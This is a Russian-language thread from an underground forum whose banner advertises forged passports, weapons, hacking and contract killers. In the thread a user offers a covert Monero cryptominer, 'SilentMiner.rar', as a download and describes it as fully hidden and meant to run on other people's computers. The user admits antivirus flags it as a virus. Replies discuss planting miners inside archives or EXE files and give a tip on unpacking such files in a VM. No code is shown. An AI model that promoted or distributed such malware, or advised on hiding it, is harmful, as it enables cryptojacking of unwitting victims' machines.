Что нового
Теневой форум

Добро пожаловать на FSELL- крупнейший теневой форум. У нас Вы сможете найти огромное количество заработка в интернете, купить паспорт, ксиву, оружие, куча многих товаров и услуг, в виде пробива, взлома, нанять киллера. Все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса, это убережет Вас от мошенников.

⋆ SOFT ⋆ Скрытый майнер CryptoMiner XMR

Black1113

New Member
Ребята, у меня сегодня есть что-то особенное - скрытый CryptoMiner XMR. Вы можете использовать этот инструмент для своего Monero, используя компьютер ваших подчиненных в скрытом режиме.

Функции бегут вниз.

1. Полностью скрыт и неактивен в фоновом режиме.
2. * Не требует .Net Framework для работы.
3. Вы можете изменить значок своего шахтера.
4. и многие другие функции, которые вы можете проверить сами.
Screenshot-1.png


Да, конечно, антивирус обнаружит его, потому что это вирус.
Скачать: SilentMiner.rar
Пароль:1
VT
 

STARTS_Pr0

ЛЕГЕНДА ФОРУМА
Команда форума
В таком случае у меня кроются сомнения...
Сам юзаешь майнер? Если да, дай пруфы майнинга.
А тут есть любители в скрытый майнер вшивать свой скрытый майнер :Biggrin:
 

TimOnLine

New Member
В таком случае у меня кроются сомнения...
Сам юзаешь майнер? Если да, дай пруфы майнинга.
А тут есть любители в скрытый майнер вшивать свой скрытый майнер :Biggrin:

по сути вшивают майнеры в rar. файлы - чтобы уже на стадии распаовки закинуть в комп - так что эту фичу можно обойти. например - качаешь сию хрень на ВМ(обязательно в лайфе) - распаковываешь, берешь от туда нужное, запаковываешь и отправляешь себе же через почту уже точно чистый. ВМ закрываешь ивсё что в нее залезно идет по п***е)).
P.S - сея фича не проканает если скриммер вшили в саму прогу.
 

STARTS_Pr0

ЛЕГЕНДА ФОРУМА
Команда форума
по сути вшивают майнеры в rar. файлы - чтобы уже на стадии распаовки закинуть в комп - так что эту фичу можно обойти. например - качаешь сию хрень на ВМ(обязательно в лайфе) - распаковываешь, берешь от туда нужное, запаковываешь и отправляешь себе же через почту уже точно чистый. ВМ закрываешь ивсё что в нее залезно идет по п***е)).
P.S - сея фича не проканает если скриммер вшили в саму прогу.
По больше части так и делают, вшивают свой вирус в exe файл, на обычный архив уже никто не ведется)
 

Stephenneecy

New Member
Тема ещё актуальна, заинтересованы
 
Последнее редактирование модератором:
Вверх